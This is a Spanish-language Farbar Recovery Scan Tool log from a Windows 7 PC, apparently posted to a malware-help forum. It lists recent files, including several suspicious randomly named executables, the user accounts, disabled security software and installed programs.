2020-03-25 14:25 - 2016-07-01 08:56 - 000405504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-03-25 14:25 - 2016-07-01 08:56 - 000168960 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2020-03-25 14:25 - 2016-03-09 13:00 - 000444416 _____ (Microsoft Corporation) C:\Windows\system32\winhttp.dll
2020-03-25 14:25 - 2016-03-09 13:00 - 000396800 _____ (Microsoft Corporation) C:\Windows\system32\webio.dll
2020-03-25 14:25 - 2016-03-09 12:40 - 000351744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winhttp.dll
2020-03-25 14:25 - 2016-03-09 12:40 - 000316416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webio.dll
2020-03-25 14:25 - 2016-01-20 18:51 - 000073664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\disk.sys
2020-03-25 14:25 - 2015-12-16 12:55 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\nlsbres.dll
2020-03-25 14:25 - 2015-12-16 12:53 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZEL.DLL
2020-03-25 14:25 - 2015-12-16 12:53 - 000007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDAZE.DLL
2020-03-25 14:25 - 2015-12-16 12:48 - 000007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZE.DLL
2020-03-25 14:25 - 2015-12-16 12:48 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kbdgeoqw.dll
2020-03-25 14:25 - 2015-12-16 12:48 - 000006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDAZEL.DLL
2020-03-25 14:25 - 2015-12-16 12:47 - 000069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlsbres.dll
2020-03-25 14:25 - 2015-07-09 11:58 - 001632256 _____ (Microsoft Corporation) C:\Windows\system32\dwmcore.dll
2020-03-25 14:25 - 2015-07-09 11:58 - 000082944 _____ (Microsoft Corporation) C:\Windows\system32\dwmapi.dll
2020-03-25 14:25 - 2015-07-09 11:42 - 001372160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmcore.dll
2020-03-25 14:25 - 2015-07-09 11:42 - 000067584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dwmapi.dll
2020-03-25 14:25 - 2015-04-10 21:19 - 000069888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\stream.sys
2020-03-25 14:06 - 2016-03-09 12:54 - 000275456 _____ (Microsoft Corporation) C:\Windows\system32\InkEd.dll
2020-03-25 14:06 - 2016-03-09 12:34 - 000216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InkEd.dll
2020-03-23 18:49 - 2020-03-25 19:30 - 000013779 _____ C:\Users\MARCO AVILA\Desktop\Nuevo documento de texto.txt
2020-03-12 21:11 - 2020-03-15 15:07 - 000004410 _____ C:\Users\MARCO AVILA\Desktop\Nuevo documento de texto (5).txt

==================== Un mes (modificado) ==================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-03-26 18:54 - 2016-11-27 08:17 - 000000000 ____D C:\Users\MARCO AVILA\AppData\LocalLow\Mozilla
2020-03-26 18:44 - 2012-11-11 17:09 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\CrashDumps
2020-03-26 18:41 - 2019-09-26 13:33 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2020-03-26 18:40 - 2009-07-13 23:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-03-26 18:27 - 2009-07-13 22:45 - 000025840 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-03-26 18:27 - 2009-07-13 22:45 - 000025840 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-03-26 17:16 - 2020-01-24 21:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\DMCache
2020-03-26 16:55 - 2019-08-06 10:58 - 000000000 ___HD C:\Users\MARCO AVILA\Desktop\_SNAPDOC
2020-03-26 16:38 - 2009-12-01 16:37 - 000903192 _____ C:\Windows\system32\perfh00A.dat
2020-03-26 16:38 - 2009-12-01 16:37 - 000214886 _____ C:\Windows\system32\perfc00A.dat
2020-03-26 16:38 - 2009-07-13 23:13 - 002098432 _____ C:\Windows\system32\PerfStringBackup.INI
2020-03-26 16:38 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\inf
2020-03-26 13:53 - 2019-02-16 20:05 - 000000000 ____D C:\Users\MARCO AVILA\Desktop\Nueva carpeta (2)
2020-03-26 11:34 - 2016-10-01 19:36 - 000002353 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk
2020-03-26 11:34 - 2013-05-07 17:40 - 000002232 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-03-26 11:34 - 2010-06-19 21:50 - 000001413 _____ C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2020-03-25 23:01 - 2019-08-21 16:35 - 000910336 ___SH C:\Users\MARCO AVILA\Desktop\Thumbs.db
2020-03-25 22:19 - 2020-01-24 21:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Roaming\IDM
2020-03-25 21:55 - 2016-03-17 00:20 - 000000000 ____D C:\Program Files\TAP-Windows
2020-03-25 20:36 - 2019-01-21 16:36 - 000005670 _____ C:\Users\MARCO AVILA\Desktop\Nuevo documento de texto (2).txt
2020-03-25 19:17 - 2016-10-23 11:39 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\SquirrelTemp
2020-03-25 19:13 - 2010-07-11 15:44 - 002045382 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2020-03-25 16:09 - 2018-11-06 18:43 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-03-25 15:43 - 2010-10-16 20:06 - 000000000 ____D C:\Users\MARCO AVILA\AppData\Local\ElevatedDiagnostics
2020-03-25 15:20 - 2009-07-13 22:45 - 000592696 _____ C:\Windows\system32\FNTCACHE.DAT
2020-03-25 14:41 - 2009-10-28 12:41 - 000000000 ____D C:\Windows\ShellNew
2020-03-25 14:41 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-03-25 00:40 - 2010-06-19 21:49 - 000000000 ____D C:\Users\MARCO AVILA
2020-03-25 00:38 - 2019-07-18 13:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2020-03-25 00:38 - 2018-11-06 17:05 - 000000000 ____D C:\Users\Administrador.MAAH-PC
2020-03-25 00:38 - 2017-12-03 12:49 - 000000000 ____D C:\Program Files\CCleaner
2020-03-25 00:37 - 2009-07-13 21:20 - 000000000 ____D C:\Windows\registration
2020-03-24 22:14 - 2011-12-31 01:46 - 000000000 ____D C:\Temp
2020-03-22 02:21 - 2010-09-01 20:43 - 000024576 _____ C:\Users\MARCO AVILA\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2020-03-21 20:57 - 2017-10-19 11:28 - 000000000 _____ C:\end
2020-03-21 01:10 - 2019-03-24 22:24 - 000000000 ____D C:\Users\MARCO AVILA\Desktop\Nueva carpeta (3)
2020-03-20 17:21 - 2013-05-07 17:33 - 000003536 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-03-20 17:21 - 2013-05-07 17:33 - 000003408 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-03-20 02:22 - 2009-12-01 07:55 - 000000000 ____D C:\ProgramData\Temp
2020-03-13 20:41 - 2017-05-21 00:20 - 000000000 ____D C:\KMPlayer
2020-03-13 09:29 - 2013-01-30 15:04 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-03-12 13:02 - 2015-05-15 05:54 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2020-02-25 11:56 - 2009-07-13 23:08 - 000032518 _____ C:\Windows\Tasks\SCHEDLGU.TXT

==================== Archivos en la raíz de algunos directorios ========

2009-10-28 21:38 - 2009-02-10 13:23 - 000192484 _____ () C:\Program Files (x86)\Common Files\Acer GameZone online.ico
2011-09-12 13:38 - 2012-12-13 00:53 - 000000121 _____ () C:\Users\MARCO AVILA\AppData\Roaming\Camdata.ini
2011-09-12 13:38 - 2012-12-13 00:53 - 000000408 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamLayout.ini
2011-09-12 13:38 - 2012-12-13 00:53 - 000000408 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamShapes.ini
2011-09-12 13:37 - 2012-12-13 00:52 - 000004416 _____ () C:\Users\MARCO AVILA\AppData\Roaming\CamStudio.cfg
2010-08-29 00:04 - 2013-01-28 20:11 - 000000153 _____ () C:\Users\MARCO AVILA\AppData\Roaming\default.rss
2010-08-29 00:04 - 2010-08-29 00:04 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\downloads.m3u
2019-09-21 23:40 - 2019-09-21 23:47 - 000002459 _____ () C:\Users\MARCO AVILA\AppData\Roaming\droid4xinstaller.log
2020-03-26 11:39 - 2020-03-26 11:39 - 001927680 _____ (Filipe Lourenço                                             ) C:\Users\MARCO AVILA\AppData\Roaming\ergfeefvg.exe
2014-03-13 22:31 - 2014-03-13 22:31 - 000000099 _____ () C:\Users\MARCO AVILA\AppData\Roaming\history.Excel.pwcdat
2019-06-16 01:13 - 2019-06-16 01:36 - 000000556 _____ () C:\Users\MARCO AVILA\AppData\Roaming\koukou.ini
2015-06-03 21:12 - 2015-06-03 21:12 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\ProXoft
2020-03-26 11:38 - 2020-03-26 11:39 - 002134016 _____ (Akeo Consulting) C:\Users\MARCO AVILA\AppData\Roaming\rgfwedwsax.exe
2020-03-26 11:39 - 2020-03-26 11:39 - 002300416 _____ () C:\Users\MARCO AVILA\AppData\Roaming\rvfecdxs.exe
2010-09-26 17:44 - 2010-09-26 17:44 - 000002355 _____ () C:\Users\MARCO AVILA\AppData\Roaming\SAS7_000.DAT
2015-11-15 20:33 - 2015-11-15 20:33 - 000001181 _____ () C:\Users\MARCO AVILA\AppData\Roaming\trace_FilterInstaller.txt
2015-11-15 20:33 - 2015-11-15 20:33 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\trace_FilterInstaller.txt-CRT.txt
2012-01-11 00:27 - 2012-01-11 00:27 - 000037346 _____ () C:\Users\MARCO AVILA\AppData\Roaming\Valores separados por comas (DOS).ADR
2017-12-03 12:59 - 2017-12-03 12:59 - 000000000 _____ () C:\Users\MARCO AVILA\AppData\Roaming\wklnhst.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 008509952 _____ () C:\Users\MARCO AVILA\AppData\Local\agent.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000045056 _____ () C:\Users\MARCO AVILA\AppData\Local\ApplicationHosting.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000069888 _____ () C:\Users\MARCO AVILA\AppData\Local\Config.xml
2010-09-01 20:43 - 2020-03-22 02:21 - 000024576 _____ () C:\Users\MARCO AVILA\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2013-04-19 15:25 - 2013-04-19 15:25 - 000118823 _____ () C:\Users\MARCO AVILA\AppData\Local\debuggee.mdmp
2012-02-28 14:05 - 2012-02-28 14:05 - 000000099 _____ () C:\Users\MARCO AVILA\AppData\Local\fusioncache.dat
2020-03-26 11:31 - 2020-03-26 11:32 - 000016368 _____ () C:\Users\MARCO AVILA\AppData\Local\InstallationConfiguration.xml
2020-03-26 11:31 - 2020-03-26 11:31 - 000142336 _____ () C:\Users\MARCO AVILA\AppData\Local\installer.dat
2020-03-26 11:32 - 2020-03-26 11:32 - 000126464 _____ () C:\Users\MARCO AVILA\AppData\Local\lobby.dat
2020-03-26 11:33 - 2020-03-26 11:33 - 000018432 _____ () C:\Users\MARCO AVILA\AppData\Local\Main.dat
2020-03-26 11:32 - 2020-03-26 11:33 - 000005568 _____ () C:\Users\MARCO AVILA\AppData\Local\md.xml
2020-03-26 11:33 - 2020-03-26 11:33 - 000126464 _____ () C:\Users\MARCO AVILA\AppData\Local\noah.dat
2020-03-26 11:33 - 2020-03-26 11:29 - 004667392 _____ () C:\Users\MARCO AVILA\AppData\Local\Plustech.exe
2020-03-26 11:33 - 2020-03-26 11:33 - 002160819 _____ () C:\Users\MARCO AVILA\AppData\Local\Plustech.tst
2017-04-03 16:12 - 2017-04-03 16:12 - 000002594 _____ () C:\Users\MARCO AVILA\AppData\Local\recently-used.xbel
2010-12-05 00:07 - 2018-11-04 19:36 - 000007661 _____ () C:\Users\MARCO AVILA\AppData\Local\Resmon.ResmonCfg
2020-03-26 11:33 - 2020-03-26 11:33 - 001895382 _____ () C:\Users\MARCO AVILA\AppData\Local\Suntech.bin
2020-03-26 11:32 - 2020-03-26 11:29 - 004667392 _____ () C:\Users\MARCO AVILA\AppData\Local\Techsing.exe
2020-03-26 11:32 - 2020-03-26 11:32 - 000068474 _____ () C:\Users\MARCO AVILA\AppData\Local\Techsing.tst
2020-03-26 11:34 - 2020-03-26 11:34 - 000032038 _____ () C:\Users\MARCO AVILA\AppData\Local\uninstall_temp.ico
2012-01-25 14:06 - 2012-01-25 14:06 - 000017408 _____ () C:\Users\MARCO AVILA\AppData\Local\WebpageIcons.db

==================== SigCheck ============================

(No existe una corrección automática para los archivos que no pasan la verificación.)


LastRegBack: 2020-03-19 13:04
==================== Final de FRST.txt ========================

Marco · 27 Marzo, 2020 01:28

Resultados del Análisis Adicional de Farbar Recovery Scan Tool (x64) Versión: 26-03-2020
Ejecutado por MARCO AVILA (26-03-2020 18:55:23)
Ejecutado desde C:\Users\MARCO AVILA\Desktop
Windows 7 Home Premium Service Pack 1 (X64) (2010-06-20 03:49:32)
Modo de Inicio: Normal
==========================================================


==================== Cuentas: =============================

Administrador (S-1-5-21-1649130365-987012723-906343211-500 - Administrator - Disabled) => C:\Users\Administrador.MAAH-PC
ASPNET (S-1-5-21-1649130365-987012723-906343211-1015 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-1649130365-987012723-906343211-1020 - Limited - Enabled)
Invitado (S-1-5-21-1649130365-987012723-906343211-501 - Limited - Disabled)
MARCO AVILA (S-1-5-21-1649130365-987012723-906343211-1000 - Administrator - Enabled) => C:\Users\MARCO AVILA

==================== Centro de Seguridad ========================

(Si una entrada es incluida en el fixlist, será eliminada.)

AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Programas instalados ======================

(Solo los programas de adware con indicador "Oculto", pueden ser añadidos al fixlist para hacerlos visibles. Los programas adware deben ser desinstalados manualmente.)

64 Bit HP CIO Components Installer (HKLM\...\{55D55008-E5F6-47D6-B16F-B2A40D4D145F}) (Version: 6.2.1 - Hewlett-Packard) Hidden
7-Zip 9.20 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0920-000001000000}) (Version: 9.20.00.0 - Igor Pavlov)
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.29 - NewTech Infosystems)
Acer Crystal Eye webcam Ver:1.1.124.1120 (HKLM-x32\...\{D0ACE89D-EC7F-470F-80BE-4C98ED366B32}) (Version: 1.1.124.1120 - Chicony Electronics Co.,Ltd.)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3005 - Acer Incorporated)
Acer GameZone Console (HKLM-x32\...\{8ed9688e-4f79-4308-91ca-f1c37ca142b4}_is1) (Version: 5.1.0.2 - Oberon Media, Inc.)
Acer GridVista (HKLM-x32\...\GridVista) (Version: 3.01.0730 - Acer Inc.)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 4.07.3008 - Acer Incorporated)
Acer Registration (HKLM-x32\...\Acer Registration) (Version: 1.02.3006 - Acer Incorporated)
Acer ScreenSaver (HKLM-x32\...\Acer Screensaver) (Version: 1.1.0715 - Acer Incorporated)
Acer VCM (HKLM-x32\...\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}) (Version: 4.05.3000 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.5.1.17730 - Adobe Systems Inc.)
Adobe Flash Player 23 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 23.0.0.205 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.255 - Adobe)
Adobe Shockwave Player 12.0 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.0.2.122 - Adobe Systems, Inc.)
Advanced Archive Password Recovery (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Advanced Archive Password Recovery) (Version: 4.50 - ElcomSoft Co. Ltd.)
Advanced Office Password Recovery (HKLM-x32\...\{867A00F3-027A-4946-8CE2-F77FEBCD1BA8}) (Version: 5.2.498.423 - Elcomsoft Co. Ltd.)
Advanced PDF Password Recovery (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Advanced PDF Password Recovery) (Version: 5.0 - ElcomSoft Co. Ltd.)
Advanced RAR Password Recovery (remove only) (HKLM-x32\...\Advanced RAR Password Recovery) (Version:  - )
Advanced RAR Repair v1.2 (HKLM-x32\...\Advanced RAR Repair v1.2) (Version:  - )
Advanced VBA Password Recovery PRO (HKLM-x32\...\Advanced VBA Password Recovery PRO) (Version:  - )
Advanced ZIP Password Recovery (remove only) (HKLM-x32\...\Advanced ZIP Password Recovery) (Version:  - )
Aimersoft Helper Compact 2.5.2 (HKLM-x32\...\{405147F7-FCC5-499B-A27E-EA6BD4A80435}_is1) (Version: 2.5.2 - Aimersoft)
Alice Greenfingers (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112920767}) (Version:  - Oberon Media)
Amazonia (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11273477}) (Version:  - Oberon Media)
AndreaMosaic 3.33.0 (HKLM-x32\...\AndreaMosaic) (Version:  - )
Apple Application Support (HKLM-x32\...\{A83279FD-CA4B-4206-9535-90974DE76654}) (Version: 2.1.5 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Archivos auxiliares de instalación de Microsoft SQL Server 2008 (HKLM\...\{A639F412-1C05-4DCB-BF41-AD122A09E79C}) (Version: 10.2.4000.0 - Microsoft Corporation)
Ares 2.1.7 (HKLM-x32\...\Ares) (Version: 2.1.7-Build#3041 - Ares Development Group)
Ashampoo Burning Studio 8.02 (HKLM-x32\...\Ashampoo Burning Studio 8_is1) (Version: 8.0.2 - ashampoo GmbH & Co. KG)
Ashampoo Snap 8 (HKLM-x32\...\{C92AB6F1-3B65-B79C-9019-8640F02B7C58}_is1) (Version: 8.0.7 - Ashampoo GmbH & Co. KG)
Asistente Infinitum (HKLM-x32\...\{BD1806A5-1B46-4DDC-A0B6-5F4D48022C78}) (Version: 1.7.0 - Fine Point Technologies, Inc.)
ASOFARMA (HKLM-x32\...\Vademecum IPE_is1) (Version:  - )
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.10 - Atheros Communications Inc.)
Atheros Driver Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 8.0.0.171 - Atheros)
AutoPlay Media Studio 8 Personal Edition (HKLM-x32\...\AutoPlay Media Studio 8 Personal Edition) (Version: 8.0.1.1 - Indigo Rose Corporation)
Backup Manager Basic (HKLM-x32\...\{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.29 - NewTech Infosystems) Hidden
BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.7.307.8213 - BlueStack Systems, Inc.)
CambridgeSoft Activation Client (HKLM-x32\...\{E773E0B9-6ABE-4F9E-816C-56B2DD8613B9}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ChemOffice Ultra 2010 (HKLM-x32\...\{D5402C39-C1C1-48F6-99C2-36C7937EE7EB}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ChemScript 12.0 (HKLM-x32\...\{E145D9BE-D521-4527-A85D-2B2D47725506}) (Version: 12.0 - CambridgeSoft Corporation)
CambridgeSoft ENotebook 12.0.1 (HKLM-x32\...\{F596E368-2A1D-4896-AB37-C81BFA4DD011}) (Version: 12.0.1 - CambridgeSoft Corporation)
Camtasia Studio 8 (HKLM-x32\...\{B1F8F5EB-75E2-40C3-9A50-7907F1C910F1}) (Version: 8.0.3.994 - TechSmith Corporation)
CBTL_TwitterImageDownloader (HKLM-x32\...\{2223143E-3B2D-46B4-BD2F-B6DEAED131EF}) (Version: 2.00.0000 - Code Between The Lines)
CCleaner (HKLM\...\CCleaner) (Version: 5.60 - Piriform)
Chicken Invaders 2 (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110209593}) (Version:  - Oberon Media)
CloudNet (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATENCIÓN
CollageIt 1.1.6 (HKLM-x32\...\{D9757258-30B2-496E-86F2-84920C5858E1}_is1) (Version:  - PearlMountain Soft)
Control ActiveX de Windows Live Mesh para conexiones remotas (HKLM-x32\...\{04668DF2-D32F-4555-9C7E-35523DCD6544}) (Version: 15.4.5722.2 - Microsoft Corporation)
ConvertHelper 3.1.1 (HKLM\...\{27CC6AB1-E72B-4179-AF1A-EAE507EBAF52}}_is1) (Version:  - DownloadHelper)
CoreAAC (HKLM-x32\...\CoreAAC) (Version:  - )
CPUID CPU-Z 1.86 (HKLM\...\CPUID CPU-Z_is1) (Version: 1.86 - CPUID, Inc.)
CyberGhost 6 (HKLM\...\CyberGhost 6_is1) (Version:  - CyberGhost S.R.L.)
CyberLink PowerDVD 8 (HKLM-x32\...\InstallShield_{2BF2E31F-B8BB-40A7-B650-98D28E0F7D47}) (Version: 8.1.3405.50 - CyberLink Corp.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
Dairy Dash (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-115053100}) (Version:  - Oberon Media)
Descargador de Video de Apowersoft V6.2.1 (HKLM-x32\...\{b3336f66-e079-4ff6-abdb-51e2fab781d5}_is1) (Version: 6.2.1 - APOWERSOFT LIMITED)
DjVuLibre+DjView (HKLM-x32\...\DjVuLibre+DjView) (Version: 3.5.24+4.7c - DjVuZone)
Dream Day First Home (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version:  - Oberon Media)
EaseUS Data Recovery Wizard 6.1 (HKLM-x32\...\EaseUS Data Recovery Wizard 6.1_is1) (Version:  - EaseUS)
Eines de correcció del Microsoft Office 2016: català (HKLM-x32\...\{90160000-001F-0403-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Electrum (HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Electrum) (Version: 3.2.2 - Electrum Technologies GmbH)
eSobi v2 (HKLM-x32\...\{15D967B5-A4BE-42AE-9E84-64CD062B25AA}) (Version: 2.0.4.000274 - esobi Inc.) Hidden
eSobi v2 (HKLM-x32\...\InstallShield_{15D967B5-A4BE-42AE-9E84-64CD062B25AA}) (Version: 2.0.4.000274 - esobi Inc.)
EVEREST Ultimate Edition v4.60 (HKLM-x32\...\EVEREST Ultimate Edition_is1) (Version: 4.60 - Lavalys, Inc.)
ExamDiff Pro 8.0 (8.0.1.2, 64-bit) (HKLM\...\ExamDiff Pro 8.0_is1) (Version: 8.0.1.2 - PrestoSoft LLC)
ExpressVPN (HKLM-x32\...\{4520629e-a2a3-4646-81b1-ed6e089a24be}) (Version: 7.2.3.9028 - ExpressVPN)
ExpressVPN (HKLM-x32\...\{E5B9C3E5-889C-4F22-A959-F4B846EDAB75}) (Version: 7.2.3.9028 - ExpressVPN) Hidden
Farm Frenzy 2 (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11531173}) (Version:  - Oberon Media)
Ferramentas de verificación de Microsoft Office 2016 - Galego (HKLM-x32\...\{90160000-001F-0456-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
First Class Flurry (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-115208410}) (Version:  - Oberon Media)
Free Download Manager (HKLM\...\{43781dff-e0df-49ce-a6d2-47da96a485e7}}_is1) (Version:  - FreeDownloadManager.ORG)
Free Studio version 5.3.5 (HKLM-x32\...\Free Studio_is1) (Version: 5.3.5 - DVDVideoSoft Ltd.)
Galería fotográfica de Windows Live (HKLM-x32\...\{E85A4EFC-82F2-4CEE-8A8E-62FDAD353A66}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
GetFLV 9.7.6.9 (HKLM-x32\...\GetFLV_is1) (Version:  - GetFLV, Inc.)
GOM Player (HKLM-x32\...\GOM Player) (Version: 2.3.51.5315 - GOM & Company)
GOM Remote (HKLM-x32\...\GOM Remote) (Version: 2.1.1.5 - GOM & Company)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 80.0.3987.149 - Google LLC)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.35.451 - Google LLC) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Granny In Paradise (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110551697}) (Version:  - Oberon Media)
guaca Screen Saver (HKLM-x32\...\guaca) (Version:  - )
Heroes of Hellas (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113786380}) (Version:  - Oberon Media)
Herramientas de corrección de Microsoft Office 2016: español (HKLM-x32\...\{90160000-001F-0C0A-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
HP Update (HKLM-x32\...\{7059BDA7-E1DB-442C-B7A1-6144596720A4}) (Version: 4.000.011.006 - Hewlett-Packard)
HTTP Analyzer V7.6.4 (HKLM-x32\...\{8DF9C507-AB88-43E4-A4F0-E2E493C4B0CE}_is1) (Version: 7.6.4 - IEInspector Software)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3002 - Acer Incorporated)
ImagXpress (HKLM-x32\...\{A8F2089B-1F79-4BF6-B385-A2C2B0B9A74D}) (Version: 7.0.74.0 - Nero AG) Hidden
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1892 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
IsoBuster 2.8.5 (HKLM-x32\...\IsoBuster_is1) (Version: 2.8.5 - Smart Projects)
Jaksta Streaming Media Recorder (HKLM\...\{04FE9AD5-1ABC-4297-B2A5-6495D4977B4B}) (Version: 4.1.1 - Applian Technologies)
Java 8 Update 201 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180201F0}) (Version: 8.0.2010.9 - Oracle Corporation)
JavaFX 2.1.1 (HKLM-x32\...\{1111706F-666A-4037-7777-211328764D10}) (Version: 2.1.1 - Oracle Corporation)
Junk Mail filter update (HKLM-x32\...\{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}) (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
K-Lite Codec Pack 8.9.2 (Full) (HKLM-x32\...\KLiteCodecPack_is1) (Version: 8.9.2 - )
KMPlayer (remove only) (HKLM-x32\...\The KMPlayer) (Version: 4.2.2.34 - PandoraTV)
Launch Manager (HKLM-x32\...\LManager) (Version: 3.0.03 - Acer Inc.)
Lupas Rename 2000 v5.0 Release (HKLM-x32\...\Lupas Rename 2000_is1) (Version:  - Ivan Anton Albarracin)
Malwarebytes version 4.1.0.56 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.1.0.56 - Malwarebytes)
Marco trabajo apl. capa datos de Microsoft SQL Server 2008 R2 (HKLM-x32\...\{B65527FD-47DD-4A07-9E07-64DA91B0A34A}) (Version: 10.50.1447.4 - Microsoft Corporation)
Mendeley Desktop 1.17.9 (HKLM-x32\...\Mendeley Desktop) (Version: 1.17.9 - Mendeley Ltd.)
Merriam Websters Spell Jam (HKLM-x32\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-112662477}) (Version:  - Oberon Media)
Mesh Runtime (HKLM-x32\...\{8C6D6116-B724-4810-8F2D-D047E6B7D68E}) (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
